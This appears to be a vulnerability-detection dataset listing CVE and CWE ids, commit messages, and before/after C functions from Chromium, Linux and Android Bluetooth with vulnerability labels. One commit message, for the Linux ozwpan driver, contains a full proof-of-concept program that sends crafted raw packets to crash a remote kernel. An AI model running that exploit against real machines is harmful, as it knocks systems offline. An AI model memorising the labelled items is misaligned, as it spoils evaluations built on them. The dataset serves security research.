CVE ID
stringlengths 13
43
⌀ | CVE Page
stringlengths 45
48
⌀ | CWE ID
stringclasses 90
values | codeLink
stringlengths 46
139
| commit_id
stringlengths 6
81
| commit_message
stringlengths 3
13.3k
⌀ | func_after
stringlengths 14
241k
| func_before
stringlengths 14
241k
| lang
stringclasses 3
values | project
stringclasses 309
values | vul
int8 0
1
|
---|---|---|---|---|---|---|---|---|---|---|
null | null | null |
https://github.com/chromium/chromium/commit/181c7400b2bf50ba02ac77149749fb419b4d4797
|
181c7400b2bf50ba02ac77149749fb419b4d4797
|
gpu: Use GetUniformSetup computed result size.
R=piman@chromium.org
BUG=468936
Review URL: https://codereview.chromium.org/1016193003
Cr-Commit-Position: refs/heads/master@{#321489}
|
error::Error GLES2DecoderImpl::HandleTexImage3D(uint32 immediate_data_size,
const void* cmd_data) {
if (!unsafe_es3_apis_enabled())
return error::kUnknownCommand;
const gles2::cmds::TexImage3D& c =
*static_cast<const gles2::cmds::TexImage3D*>(cmd_data);
TRACE_EVENT2("gpu", "GLES2DecoderImpl::HandleTexImage3D",
"widthXheight", c.width * c.height, "depth", c.depth);
GLenum target = static_cast<GLenum>(c.target);
GLint level = static_cast<GLint>(c.level);
GLenum internal_format = static_cast<GLenum>(c.internalformat);
GLsizei width = static_cast<GLsizei>(c.width);
GLsizei height = static_cast<GLsizei>(c.height);
GLsizei depth = static_cast<GLsizei>(c.depth);
GLint border = static_cast<GLint>(c.border);
GLenum format = static_cast<GLenum>(c.format);
GLenum type = static_cast<GLenum>(c.type);
uint32 pixels_shm_id = static_cast<uint32>(c.pixels_shm_id);
uint32 pixels_shm_offset = static_cast<uint32>(c.pixels_shm_offset);
uint32 pixels_size;
if (!GLES2Util::ComputeImageDataSizes(
width, height, depth, format, type, state_.unpack_alignment, &pixels_size,
NULL, NULL)) {
return error::kOutOfBounds;
}
const void* pixels = NULL;
if (pixels_shm_id != 0 || pixels_shm_offset != 0) {
pixels = GetSharedMemoryAs<const void*>(
pixels_shm_id, pixels_shm_offset, pixels_size);
if (!pixels) {
return error::kOutOfBounds;
}
}
glTexImage3D(target, level, internal_format, width, height, depth, border,
format, type, pixels);
ExitCommandProcessingEarly();
return error::kNoError;
}
|
error::Error GLES2DecoderImpl::HandleTexImage3D(uint32 immediate_data_size,
const void* cmd_data) {
if (!unsafe_es3_apis_enabled())
return error::kUnknownCommand;
const gles2::cmds::TexImage3D& c =
*static_cast<const gles2::cmds::TexImage3D*>(cmd_data);
TRACE_EVENT2("gpu", "GLES2DecoderImpl::HandleTexImage3D",
"widthXheight", c.width * c.height, "depth", c.depth);
GLenum target = static_cast<GLenum>(c.target);
GLint level = static_cast<GLint>(c.level);
GLenum internal_format = static_cast<GLenum>(c.internalformat);
GLsizei width = static_cast<GLsizei>(c.width);
GLsizei height = static_cast<GLsizei>(c.height);
GLsizei depth = static_cast<GLsizei>(c.depth);
GLint border = static_cast<GLint>(c.border);
GLenum format = static_cast<GLenum>(c.format);
GLenum type = static_cast<GLenum>(c.type);
uint32 pixels_shm_id = static_cast<uint32>(c.pixels_shm_id);
uint32 pixels_shm_offset = static_cast<uint32>(c.pixels_shm_offset);
uint32 pixels_size;
if (!GLES2Util::ComputeImageDataSizes(
width, height, depth, format, type, state_.unpack_alignment, &pixels_size,
NULL, NULL)) {
return error::kOutOfBounds;
}
const void* pixels = NULL;
if (pixels_shm_id != 0 || pixels_shm_offset != 0) {
pixels = GetSharedMemoryAs<const void*>(
pixels_shm_id, pixels_shm_offset, pixels_size);
if (!pixels) {
return error::kOutOfBounds;
}
}
glTexImage3D(target, level, internal_format, width, height, depth, border,
format, type, pixels);
ExitCommandProcessingEarly();
return error::kNoError;
}
|
C
|
Chrome
| 0 |
CVE-2016-8666
|
https://www.cvedetails.com/cve/CVE-2016-8666/
|
CWE-400
|
https://github.com/torvalds/linux/commit/fac8e0f579695a3ecbc4d3cac369139d7f819971
|
fac8e0f579695a3ecbc4d3cac369139d7f819971
|
tunnels: Don't apply GRO to multiple layers of encapsulation.
When drivers express support for TSO of encapsulated packets, they
only mean that they can do it for one layer of encapsulation.
Supporting additional levels would mean updating, at a minimum,
more IP length fields and they are unaware of this.
No encapsulation device expresses support for handling offloaded
encapsulated packets, so we won't generate these types of frames
in the transmit path. However, GRO doesn't have a check for
multiple levels of encapsulation and will attempt to build them.
UDP tunnel GRO actually does prevent this situation but it only
handles multiple UDP tunnels stacked on top of each other. This
generalizes that solution to prevent any kind of tunnel stacking
that would cause problems.
Fixes: bf5a755f ("net-gre-gro: Add GRE support to the GRO stack")
Signed-off-by: Jesse Gross <jesse@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
void netdev_state_change(struct net_device *dev)
{
if (dev->flags & IFF_UP) {
struct netdev_notifier_change_info change_info;
change_info.flags_changed = 0;
call_netdevice_notifiers_info(NETDEV_CHANGE, dev,
&change_info.info);
rtmsg_ifinfo(RTM_NEWLINK, dev, 0, GFP_KERNEL);
}
}
|
void netdev_state_change(struct net_device *dev)
{
if (dev->flags & IFF_UP) {
struct netdev_notifier_change_info change_info;
change_info.flags_changed = 0;
call_netdevice_notifiers_info(NETDEV_CHANGE, dev,
&change_info.info);
rtmsg_ifinfo(RTM_NEWLINK, dev, 0, GFP_KERNEL);
}
}
|
C
|
linux
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/19190765882e272a6a2162c89acdb29110f7e3cf
|
19190765882e272a6a2162c89acdb29110f7e3cf
|
Revert 102184 - [Sync] use base::Time in sync
Make EntryKernel/Entry/BaseNode use base::Time instead of int64s.
Add sync/util/time.h, with utility functions to manage the sync proto
time format.
Store times on disk in proto format instead of the local system.
This requires a database version bump (to 77).
Update SessionChangeProcessor/SessionModelAssociator
to use base::Time, too.
Remove hackish Now() function.
Remove ZeroFields() function, and instead zero-initialize in EntryKernel::EntryKernel() directly.
BUG=
TEST=
Review URL: http://codereview.chromium.org/7981006
TBR=akalin@chromium.org
Review URL: http://codereview.chromium.org/7977034
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@102186 0039d316-1c4b-4281-b951-d872f2087c98
|
int64 Get(int64 metahandle, syncable::BaseVersion field) const {
const int64 kDefaultValue = -100;
return GetField(metahandle, field, kDefaultValue);
}
|
int64 Get(int64 metahandle, syncable::BaseVersion field) const {
const int64 kDefaultValue = -100;
return GetField(metahandle, field, kDefaultValue);
}
|
C
|
Chrome
| 0 |
CVE-2014-3191
|
https://www.cvedetails.com/cve/CVE-2014-3191/
|
CWE-416
|
https://github.com/chromium/chromium/commit/11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
|
11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
|
Defer call to updateWidgetPositions() outside of RenderLayerScrollableArea.
updateWidgetPositions() can destroy the render tree, so it should never
be called from inside RenderLayerScrollableArea. Leaving it there allows
for the potential of use-after-free bugs.
BUG=402407
R=vollick@chromium.org
Review URL: https://codereview.chromium.org/490473003
git-svn-id: svn://svn.chromium.org/blink/trunk@180681 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
bool RenderLayerScrollableArea::hitTestOverflowControls(HitTestResult& result, const IntPoint& localPoint)
{
if (!hasScrollbar() && !box().canResize())
return false;
IntRect resizeControlRect;
if (box().style()->resize() != RESIZE_NONE) {
resizeControlRect = resizerCornerRect(box().pixelSnappedBorderBoxRect(), ResizerForPointer);
if (resizeControlRect.contains(localPoint))
return true;
}
int resizeControlSize = max(resizeControlRect.height(), 0);
if (m_vBar && m_vBar->shouldParticipateInHitTesting()) {
LayoutRect vBarRect(verticalScrollbarStart(0, box().width()),
box().borderTop(),
m_vBar->width(),
box().height() - (box().borderTop() + box().borderBottom()) - (m_hBar ? m_hBar->height() : resizeControlSize));
if (vBarRect.contains(localPoint)) {
result.setScrollbar(m_vBar.get());
return true;
}
}
resizeControlSize = max(resizeControlRect.width(), 0);
if (m_hBar && m_hBar->shouldParticipateInHitTesting()) {
LayoutRect hBarRect(horizontalScrollbarStart(0),
box().height() - box().borderBottom() - m_hBar->height(),
box().width() - (box().borderLeft() + box().borderRight()) - (m_vBar ? m_vBar->width() : resizeControlSize),
m_hBar->height());
if (hBarRect.contains(localPoint)) {
result.setScrollbar(m_hBar.get());
return true;
}
}
return false;
}
|
bool RenderLayerScrollableArea::hitTestOverflowControls(HitTestResult& result, const IntPoint& localPoint)
{
if (!hasScrollbar() && !box().canResize())
return false;
IntRect resizeControlRect;
if (box().style()->resize() != RESIZE_NONE) {
resizeControlRect = resizerCornerRect(box().pixelSnappedBorderBoxRect(), ResizerForPointer);
if (resizeControlRect.contains(localPoint))
return true;
}
int resizeControlSize = max(resizeControlRect.height(), 0);
if (m_vBar && m_vBar->shouldParticipateInHitTesting()) {
LayoutRect vBarRect(verticalScrollbarStart(0, box().width()),
box().borderTop(),
m_vBar->width(),
box().height() - (box().borderTop() + box().borderBottom()) - (m_hBar ? m_hBar->height() : resizeControlSize));
if (vBarRect.contains(localPoint)) {
result.setScrollbar(m_vBar.get());
return true;
}
}
resizeControlSize = max(resizeControlRect.width(), 0);
if (m_hBar && m_hBar->shouldParticipateInHitTesting()) {
LayoutRect hBarRect(horizontalScrollbarStart(0),
box().height() - box().borderBottom() - m_hBar->height(),
box().width() - (box().borderLeft() + box().borderRight()) - (m_vBar ? m_vBar->width() : resizeControlSize),
m_hBar->height());
if (hBarRect.contains(localPoint)) {
result.setScrollbar(m_hBar.get());
return true;
}
}
return false;
}
|
C
|
Chrome
| 0 |
CVE-2019-5787
|
https://www.cvedetails.com/cve/CVE-2019-5787/
|
CWE-416
|
https://github.com/chromium/chromium/commit/6a7063ae61cf031630b48bdcdb09863ffc199962
|
6a7063ae61cf031630b48bdcdb09863ffc199962
|
Clean up CanvasResourceDispatcher on finalizer
We may have pending mojo messages after GC, so we want to drop the
dispatcher as soon as possible.
Bug: 929757,913964
Change-Id: I5789bcbb55aada4a74c67a28758f07686f8911c0
Reviewed-on: https://chromium-review.googlesource.com/c/1489175
Reviewed-by: Ken Rockot <rockot@google.com>
Commit-Queue: Ken Rockot <rockot@google.com>
Commit-Queue: Fernando Serboncini <fserb@chromium.org>
Auto-Submit: Fernando Serboncini <fserb@chromium.org>
Cr-Commit-Position: refs/heads/master@{#635833}
|
HTMLCanvasElement::CreateAccelerated2dBuffer() {
base::WeakPtr<WebGraphicsContext3DProviderWrapper> context_provider_wrapper =
SharedGpuContext::ContextProviderWrapper();
const bool needs_vertical_flip =
!(context_provider_wrapper && context_provider_wrapper->ContextProvider()
->GetCapabilities()
.mesa_framebuffer_flip_y);
auto surface = std::make_unique<Canvas2DLayerBridge>(
Size(), Canvas2DLayerBridge::kEnableAcceleration, ColorParams(),
needs_vertical_flip);
if (!surface->IsValid())
return nullptr;
if (MemoryPressureListenerRegistry::IsLowEndDevice())
surface->DisableDeferral(kDisableDeferralReasonLowEndDevice);
return surface;
}
|
HTMLCanvasElement::CreateAccelerated2dBuffer() {
base::WeakPtr<WebGraphicsContext3DProviderWrapper> context_provider_wrapper =
SharedGpuContext::ContextProviderWrapper();
const bool needs_vertical_flip =
!(context_provider_wrapper && context_provider_wrapper->ContextProvider()
->GetCapabilities()
.mesa_framebuffer_flip_y);
auto surface = std::make_unique<Canvas2DLayerBridge>(
Size(), Canvas2DLayerBridge::kEnableAcceleration, ColorParams(),
needs_vertical_flip);
if (!surface->IsValid())
return nullptr;
if (MemoryPressureListenerRegistry::IsLowEndDevice())
surface->DisableDeferral(kDisableDeferralReasonLowEndDevice);
return surface;
}
|
C
|
Chrome
| 0 |
CVE-2014-9644
|
https://www.cvedetails.com/cve/CVE-2014-9644/
|
CWE-264
|
https://github.com/torvalds/linux/commit/4943ba16bbc2db05115707b3ff7b4874e9e3c560
|
4943ba16bbc2db05115707b3ff7b4874e9e3c560
|
crypto: include crypto- module prefix in template
This adds the module loading prefix "crypto-" to the template lookup
as well.
For example, attempting to load 'vfat(blowfish)' via AF_ALG now correctly
includes the "crypto-" prefix at every level, correctly rejecting "vfat":
net-pf-38
algif-hash
crypto-vfat(blowfish)
crypto-vfat(blowfish)-all
crypto-vfat
Reported-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Kees Cook <keescook@chromium.org>
Acked-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
|
int shash_ahash_mcryptd_update(struct ahash_request *req,
struct shash_desc *desc)
{
struct crypto_shash *tfm = desc->tfm;
struct shash_alg *shash = crypto_shash_alg(tfm);
/* alignment is to be done by multi-buffer crypto algorithm if needed */
return shash->update(desc, NULL, 0);
}
|
int shash_ahash_mcryptd_update(struct ahash_request *req,
struct shash_desc *desc)
{
struct crypto_shash *tfm = desc->tfm;
struct shash_alg *shash = crypto_shash_alg(tfm);
/* alignment is to be done by multi-buffer crypto algorithm if needed */
return shash->update(desc, NULL, 0);
}
|
C
|
linux
| 0 |
CVE-2015-4003
|
https://www.cvedetails.com/cve/CVE-2015-4003/
|
CWE-189
|
https://github.com/torvalds/linux/commit/04bf464a5dfd9ade0dda918e44366c2c61fce80b
|
04bf464a5dfd9ade0dda918e44366c2c61fce80b
|
ozwpan: divide-by-zero leading to panic
A network supplied parameter was not checked before division, leading to
a divide-by-zero. Since this happens in the softirq path, it leads to a
crash. A PoC follows below, which requires the ozprotocol.h file from
this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
struct oz_elt oz_elt2;
struct oz_multiple_fixed oz_multiple_fixed;
} __packed packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 0,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
},
.oz_elt2 = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_multiple_fixed)
},
.oz_multiple_fixed = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_USB_ENDPOINT_DATA,
.endpoint = 0,
.format = OZ_DATA_F_MULTIPLE_FIXED,
.unit_size = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
|
static int oz_usb_set_clear_feature_req(void *hpd, u8 req_id, u8 type,
u8 recipient, u8 index, __le16 feature)
{
struct oz_usb_ctx *usb_ctx = hpd;
struct oz_pd *pd = usb_ctx->pd;
struct oz_elt *elt;
struct oz_elt_buf *eb = &pd->elt_buff;
struct oz_elt_info *ei = oz_elt_info_alloc(&pd->elt_buff);
struct oz_feature_req *body;
if (ei == NULL)
return -1;
elt = (struct oz_elt *)ei->data;
elt->length = sizeof(struct oz_feature_req);
body = (struct oz_feature_req *)(elt+1);
body->type = type;
body->req_id = req_id;
body->recipient = recipient;
body->index = index;
put_unaligned(feature, &body->feature);
return oz_usb_submit_elt(eb, ei, usb_ctx, 0, 0);
}
|
static int oz_usb_set_clear_feature_req(void *hpd, u8 req_id, u8 type,
u8 recipient, u8 index, __le16 feature)
{
struct oz_usb_ctx *usb_ctx = hpd;
struct oz_pd *pd = usb_ctx->pd;
struct oz_elt *elt;
struct oz_elt_buf *eb = &pd->elt_buff;
struct oz_elt_info *ei = oz_elt_info_alloc(&pd->elt_buff);
struct oz_feature_req *body;
if (ei == NULL)
return -1;
elt = (struct oz_elt *)ei->data;
elt->length = sizeof(struct oz_feature_req);
body = (struct oz_feature_req *)(elt+1);
body->type = type;
body->req_id = req_id;
body->recipient = recipient;
body->index = index;
put_unaligned(feature, &body->feature);
return oz_usb_submit_elt(eb, ei, usb_ctx, 0, 0);
}
|
C
|
linux
| 0 |
CVE-2016-0850
|
https://www.cvedetails.com/cve/CVE-2016-0850/
|
CWE-264
|
https://android.googlesource.com/platform/external/bluetooth/bluedroid/+/c677ee92595335233eb0e7b59809a1a94e7a678a
|
c677ee92595335233eb0e7b59809a1a94e7a678a
|
DO NOT MERGE Remove Porsche car-kit pairing workaround
Bug: 26551752
Change-Id: I14c5e3fcda0849874c8a94e48aeb7d09585617e1
|
tBTM_STATUS btm_sec_l2cap_access_req (BD_ADDR bd_addr, UINT16 psm, UINT16 handle,
CONNECTION_TYPE conn_type,
tBTM_SEC_CALLBACK *p_callback,
void *p_ref_data)
{
tBTM_SEC_DEV_REC *p_dev_rec;
tBTM_SEC_SERV_REC *p_serv_rec;
UINT16 security_required;
UINT16 old_security_required;
BOOLEAN old_is_originator;
tBTM_STATUS rc = BTM_SUCCESS;
BOOLEAN chk_acp_auth_done = FALSE;
BOOLEAN is_originator;
BOOLEAN transport = FALSE; /* should check PSM range in LE connection oriented L2CAP connection */
#if (L2CAP_UCD_INCLUDED == TRUE)
if (conn_type & CONNECTION_TYPE_ORIG_MASK)
is_originator = TRUE;
else
is_originator = FALSE;
BTM_TRACE_DEBUG ("btm_sec_l2cap_access_req conn_type:0x%x, 0x%x", conn_type, p_ref_data);
#else
is_originator = conn_type;
BTM_TRACE_DEBUG ("btm_sec_l2cap_access_req is_originator:%d, 0x%x", is_originator, p_ref_data);
#endif
/* Find or get oldest record */
p_dev_rec = btm_find_or_alloc_dev (bd_addr);
p_dev_rec->hci_handle = handle;
/* Find the service record for the PSM */
p_serv_rec = btm_sec_find_first_serv (conn_type, psm);
/* If there is no application registered with this PSM do not allow connection */
if (!p_serv_rec)
{
BTM_TRACE_WARNING ("btm_sec_l2cap_access_req() PSM:%d no application registerd", psm);
(*p_callback) (bd_addr, transport, p_ref_data, BTM_MODE_UNSUPPORTED);
return(BTM_MODE_UNSUPPORTED);
}
/* SDP connection we will always let through */
if (BT_PSM_SDP == psm)
{
(*p_callback) (bd_addr,transport, p_ref_data, BTM_SUCCESS_NO_SECURITY);
return(BTM_SUCCESS);
}
#if (L2CAP_UCD_INCLUDED == TRUE)
if ( conn_type & CONNECTION_TYPE_CONNLESS_MASK )
{
security_required = p_serv_rec->ucd_security_flags;
rc = BTM_CMD_STARTED;
if (is_originator)
{
if (((security_required & BTM_SEC_OUT_FLAGS) == 0) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_AUTHENTICATE) && (p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == (BTM_SEC_OUT_AUTHENTICATE | BTM_SEC_OUT_ENCRYPT)) && (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_FLAGS) && (p_dev_rec->sec_flags & BTM_SEC_AUTHORIZED))) )
{
rc = BTM_SUCCESS;
}
}
else
{
if (((security_required & BTM_SEC_IN_FLAGS) == 0) ||
((((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_AUTHENTICATE) && (p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED))) ||
((((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_ENCRYPT)) && (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED))) ||
((((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_FLAGS) && (p_dev_rec->sec_flags & BTM_SEC_AUTHORIZED))) )
{
rc = BTM_SUCCESS;
}
}
if (rc == BTM_SUCCESS)
{
if (p_callback)
(*p_callback) (bd_addr, transport, (void *)p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
}
else
#endif
{
security_required = p_serv_rec->security_flags;
}
/* there are some devices (moto KRZR) which connects to several services at the same time */
/* we will process one after another */
if ( (p_dev_rec->p_callback) || (btm_cb.pairing_state != BTM_PAIR_STATE_IDLE) )
{
BTM_TRACE_EVENT ("btm_sec_l2cap_access_req() - busy - PSM:%d delayed state: %s mode:%d, sm4:0x%x",
psm, btm_pair_state_descr(btm_cb.pairing_state), btm_cb.security_mode, p_dev_rec->sm4);
BTM_TRACE_EVENT ("security_flags:x%x, sec_flags:x%x", security_required, p_dev_rec->sec_flags);
rc = BTM_CMD_STARTED;
if ((BTM_SEC_MODE_SP != btm_cb.security_mode)
|| ((BTM_SEC_MODE_SP == btm_cb.security_mode) && (BTM_SM4_KNOWN == p_dev_rec->sm4))
|| (BTM_SEC_IS_SM4(p_dev_rec->sm4) && (btm_sec_is_upgrade_possible(p_dev_rec, is_originator) == FALSE))
)
{
/* legacy mode - local is legacy or local is lisbon/peer is legacy
* or SM4 with no possibility of link key upgrade */
if (is_originator)
{
if (((security_required & BTM_SEC_OUT_FLAGS) == 0) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_AUTHENTICATE) && btm_dev_authenticated(p_dev_rec))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == (BTM_SEC_OUT_AUTHENTICATE | BTM_SEC_OUT_ENCRYPT)) && btm_dev_encrypted(p_dev_rec))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_FLAGS) && btm_dev_authorized(p_dev_rec) && btm_dev_encrypted(p_dev_rec))) )
{
rc = BTM_SUCCESS;
}
}
else
{
if (((security_required & BTM_SEC_IN_FLAGS) == 0) ||
(((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_AUTHENTICATE) && btm_dev_authenticated(p_dev_rec)) ||
(((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_ENCRYPT)) && btm_dev_encrypted(p_dev_rec)) ||
(((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_AUTHORIZE) && (btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec))) ||
(((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_AUTHORIZE)) && ((btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec)) && btm_dev_authenticated(p_dev_rec))) ||
(((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_ENCRYPT | BTM_SEC_IN_AUTHORIZE)) && ((btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec)) && btm_dev_encrypted(p_dev_rec))) ||
(((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_FLAGS) && btm_dev_encrypted(p_dev_rec) && (btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec))))
{
rc = BTM_SUCCESS;
}
}
if (rc == BTM_SUCCESS)
{
if (p_callback)
(*p_callback) (bd_addr, transport, (void *)p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
}
btm_cb.sec_req_pending = TRUE;
return(BTM_CMD_STARTED);
}
/* Save pointer to service record */
p_dev_rec->p_cur_service = p_serv_rec;
/* mess /w security_required in btm_sec_l2cap_access_req for Lisbon */
if (btm_cb.security_mode == BTM_SEC_MODE_SP)
{
if (is_originator)
{
if (BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
/* SM4 to SM4 -> always authenticate & encrypt */
security_required |= (BTM_SEC_OUT_AUTHENTICATE | BTM_SEC_OUT_ENCRYPT);
}
else
{
if ( !(BTM_SM4_KNOWN & p_dev_rec->sm4))
{
BTM_TRACE_DEBUG ("remote features unknown!!sec_flags:0x%x", p_dev_rec->sec_flags);
/* the remote features are not known yet */
p_dev_rec->sm4 |= BTM_SM4_REQ_PEND;
return(BTM_CMD_STARTED);
}
}
}
else
{
/* responder */
if (BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
/* SM4 to SM4: the acceptor needs to make sure the authentication is already done */
chk_acp_auth_done = TRUE;
/* SM4 to SM4 -> always authenticate & encrypt */
security_required |= (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_ENCRYPT);
}
else
{
if ( !(BTM_SM4_KNOWN & p_dev_rec->sm4))
{
BTM_TRACE_DEBUG ("(rsp) remote features unknown!!sec_flags:0x%x", p_dev_rec->sec_flags);
/* the remote features are not known yet */
p_dev_rec->sm4 |= BTM_SM4_REQ_PEND;
return(BTM_CMD_STARTED);
}
}
}
}
BTM_TRACE_DEBUG ("btm_sec_l2cap_access_req() sm4:0x%x, sec_flags:0x%x, security_required:0x%x chk:%d",
p_dev_rec->sm4, p_dev_rec->sec_flags, security_required, chk_acp_auth_done);
old_security_required = p_dev_rec->security_required;
old_is_originator = p_dev_rec->is_originator;
p_dev_rec->security_required = security_required;
p_dev_rec->p_ref_data = p_ref_data;
p_dev_rec->is_originator = is_originator;
#if (L2CAP_UCD_INCLUDED == TRUE)
if ( conn_type & CONNECTION_TYPE_CONNLESS_MASK )
p_dev_rec->is_ucd = TRUE;
else
p_dev_rec->is_ucd = FALSE;
#endif
/* If there are multiple service records used through the same PSM */
/* leave security decision for the multiplexor on the top */
#if (L2CAP_UCD_INCLUDED == TRUE)
if (((btm_sec_find_next_serv (p_serv_rec)) != NULL)
&&(!( conn_type & CONNECTION_TYPE_CONNLESS_MASK ))) /* if not UCD */
#else
if ((btm_sec_find_next_serv (p_serv_rec)) != NULL)
#endif
{
BTM_TRACE_DEBUG ("no next_serv sm4:0x%x, chk:%d", p_dev_rec->sm4, chk_acp_auth_done);
if (!BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
BTM_TRACE_EVENT ("Security Manager: l2cap_access_req PSM:%d postponed for multiplexer", psm);
/* pre-Lisbon: restore the old settings */
p_dev_rec->security_required = old_security_required;
p_dev_rec->is_originator = old_is_originator;
(*p_callback) (bd_addr, transport, p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
}
/* if the originator is using dynamic PSM in legacy mode, do not start any security process now.
* The layer above L2CAP needs to carry out the security requirement after L2CAP connect response is received*/
if (is_originator && (btm_cb.security_mode != BTM_SEC_MODE_SP || !BTM_SEC_IS_SM4(p_dev_rec->sm4)) && (psm >= 0x1001))
{
BTM_TRACE_EVENT ("dynamic PSM:0x%x in legacy mode - postponed for upper layer", psm);
/* restore the old settings */
p_dev_rec->security_required = old_security_required;
p_dev_rec->is_originator = old_is_originator;
(*p_callback) (bd_addr, transport, p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
if (chk_acp_auth_done)
{
BTM_TRACE_DEBUG ("(SM4 to SM4) btm_sec_l2cap_access_req rspd. authenticated: x%x, enc: x%x",
(p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED), (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED));
/* SM4, but we do not know for sure which level of security we need.
* as long as we have a link key, it's OK */
if ((0 == (p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED))
||(0 == (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED)))
{
rc = BTM_DELAY_CHECK;
/*
2046 may report HCI_Encryption_Change and L2C Connection Request out of sequence
